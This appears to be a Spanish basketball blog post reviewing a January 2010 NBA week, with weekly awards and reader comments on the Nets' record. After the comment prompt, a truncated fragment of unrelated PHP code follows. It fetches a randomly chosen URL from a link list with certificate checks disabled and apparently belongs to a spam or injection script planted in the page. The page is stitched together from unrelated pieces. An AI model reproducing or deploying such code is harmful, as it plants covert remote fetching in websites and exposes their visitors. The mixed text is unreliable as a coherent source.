Informe Semanal #12

18 de January de 2010 por txusma

¿Porqué todos los jugones sonríen igual?

Seguramente todos estaríamos de acuerdo en que un equipo entrenado por Larry Brown no es precisamente, el paradigma del jugón pero como siempre hay más de un camino para llegar a la victoria, ahí tenemos a los Bobcats con 3 victorias como 3 soles, 2 de ellas clarísimas ante rivales de entidad como Spurs y Suns. De la mano de Stephen Jackson y Gerald Wallace, los de Charlotte se convierten en un rival incómodo para cualquier otro equipo y amenazan la quinta plaza del Este.

Si nadie esperaba ver a los Bobcats en estas lides a estas alturas, menos aún podíamos preveer que los Grizzlies serían otro de los equipos que acaban la semana con un 0 en el casillero de derrotas. Siguen fuera de Playoffs (es lo que tiene el salvaje oeste) pero, ¿quién duda de que si siguen a este nivel tienen muchas posibilidades de llegar a la post-temporada?

Pero en una semana feliz para muchos equipos, hay varias franquicias más que no ha probado el amargo sabor de la derrota esta semana. En Atlanta recuperan el pulso y adelantan a Orlando en la clasificación del Este; Chicago se mete en Playoffs haciendo una semana buena y otra mala (esta es una de las buenas); en Denver vuelven Billups y Carmelo y el equipo se dispara presto a disputarle el segundo puesto de la conferencia a los Mavs; y finalmente, unos épicos Blazers, recuperando poco a poco a lesionados a la vez que pierde a su líder para unos cuantos partidos. Para ganar hay que sufrir.

Ganarás el pan con el sudor de tu frente

Los 2 mejores equipos de la liga, Cavs y Lakers,  mantienen trayectorias paralelas perdiendo uno de sus partidos de esta semana. Eso sí, el equipo de Lebron James le ha dado emoción a cada uno de sus encuentros resolviéndolos todos por menos de 3 puntos de diferencia. Si no hubiera sido por Deron W…, digo, Sundiata Gaines, habrían completo una histérica pero buenísima semana.

Precisamente los Jazz son uno de los equipos triunfadores con esa victoria ante los Cavs y tan sólo una derrota ayer mismo frente los Nuggets. Tras un período titubeante parecen que recuperan el nivel justo antes de ser adelantados por toda la cabellería que llega por detrás.

En el Este fiesta y fanfarría para Raptors, Pacers, Pistons y Sixers. Con lo que están sufriendo estos 3 últimos equipos, una semana en positivo es una de las mejoras noticias que pueden recibir. Esperaremos a final de temporada para hacer balance de los Sixers con y sin Iverson. De momento, 8-11 frente 5-15.

Se dejaban llevar

La temporada regular no es una camino de rosas y sino que se lo pregunten, por ejemplo, a los Hornets. Tras una semana ganándolo todo, han tenido que sudar bastante más en ésta, justo cuando se enganchan definitivamente a la lucha por las últimos posiciones de los Playoffs. Lucha en la que también andan metidos Thunder y Spurs, dos equipos diametralmente opuestos en su concepción.

En el Este, es Miami el que flojea y con lo que viene por detrás más vale no pestañear ni un segundo.

Malos tiempos para la lírica

Ni Boston es ya el mejor equipo de la liga ni Orlando continúa siendo el tercer mejor equipos del Este y es que esta semana ha sido nefasta para sus intereses. Sobretodo los de Stan Van Gundy dejan una muy mala impresión para lo que está por venir.

Tampoco pueden estar contentos en Phoenix, Dallas o Houston (se les está haciendo larga la temporada a éstos últimos) y en cambio, una victoria en Milwaukee (que acaban de perder a Michael Redd para lo que queda de temporada), New York y sobretodo en Washington es todo un acontecimiento. Monumento para Antawn Jamison, ¡YA!

El Carabasas Club

No se pueden quejar los Nets (3-36, recordémoslo) esta semana que están solos en el club de las calabazas y es que le acompañan hasta 4 equipos más.

A los Clippers la noticia de la baja de Blake Griffin para el resto de la temporada les ha caído como un mazazo. Hasta el momento, era el debut de su rookie el que les mantenía con vida pero en estos momentos, pocas motivaciones encontrarán para seguir luchando.

Otros que se descuelgan casi definitivamente de la lucha en la que hasta hace bien poco estuvieron inmersos son los Sacramento Kings. La vuelta de Kevin Martin, lejos de mejorar el equipo, le ha vuelto a sembrar de dudas poniendo en cuestión el liderazgo de Tyreke Evans. Es momento de ver cómo se mueve en los despachos Geoff Petrie.

Minnesota, inmersos en rumores de traspaso para su teórica gran estrella Al Jefferson, y Golden State, con hasta 8 jugadores lesionados y varios de sus integrantes jugando 48 minutos por partido, son las otras franquicias que esta semana no han ganado ni un encuentro.

PREMIOS SEMANALES

MVP: Tras su vuelta tras lesión esta semana y la exhibición de anoche, Melo ha demostrado quién es el líder del segundo mejor equipo del Oeste (y quizás el que mejor baloncesto hace). 29 puntos por partido, 6 rebotes y 3 asistencias son números de MVP y de, muy posiblemente, el mejor alero bajo de la conferencia. Sin embargo, aunque su exhibición nos quede algo más lejos, nuestro MVP esta semana es Stephen Jackson, alcanzando la cifra mágica de 10.000 puntos y con promedios de 29 puntos, casi 7 rebotes y casi 5 asistencias.

El rookie: Durante esta semana no ha deslumbrado ningún rookie. Actuaciones puntuales brillantes, como la de Gaines el otro día, o de Dejuan Blair, de DeRozan, de Budinger, las típicas de Tyreke, Jennings… Sin embargo, yo me quedaría con la consistencia de Marcus Thornton y, sobre todo, la de Jonas Jerebko fundamental en la reacción de los Pistons.

La sorpresa: La sorpresa individual de esta semana no podía ser otra que la hazaña de Sundiata Gaines. Colectivamente nos quedamos con la resurrección de los Pistons y con estos Grizzlies antológicos.

La decepción: Blake Griffin en los Clippers. Alguien señalaba hace poco una especie de maldición que se ha instalado en los números #1 de los últimos drafts. Si la cosa tiene que ver con el equipo pobre de los Angeles la maldición debe de ser doble.

Comenta

4 comentarios a esta entrada

  1. Love Denise dice:
    #1

    Alguien puede decirme cual es el peor record en temporada regular? A este paso, los Nets lo batirán. Yo recuerdo los horribles Heat de Ryley hace un par de años, y también una temporada desastrosa de Cleveland, creo que la anterior a Lebron, con Kapono en los Cavs, pero no sé si esas son los peores records. Gracias.

      Citar

  2. TheDeerHunter dice:
    #2

    Es el de los “célebres” Filadelphia “nine & 73-ers” de la 1973.
    En efecto, la proyección de los Nets es de 6 o 7 victorias, con lo cual batirían el récord.

      Citar

  3. Love Denise dice:
    #3

    Gracias deer, la verdad es que es cierto que los Nets no son muy buenos y han tenido muchas lesiones, pero creo que tenían equipo para conseguir al menos 15 victorias, cuentan con buenos jugadores como Harris, Lopez, Lee o Douglas-Roberts, pero supongo que habrá mal rollo entre ellos o están descaradamente apostando por el nº 1 del draft, sin importarle hacer el rídiculo.

      Citar

  4. Txusma dice:
    #4

    Siempre me ha costado creer que a un jugador no le importe perder y que ademas lo pueda hacer de manera tan rotunda como le pasa a los Nets asi que o los jugadores no son individualmente tan buenos como pensamos, o les estan obligando desde las oficinas lo que me pareceria casi denunciable. En todo caso, quitando, a lo mejor esos 4 jugadores que comentas, el resto del equipo es muy, muy flojo.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>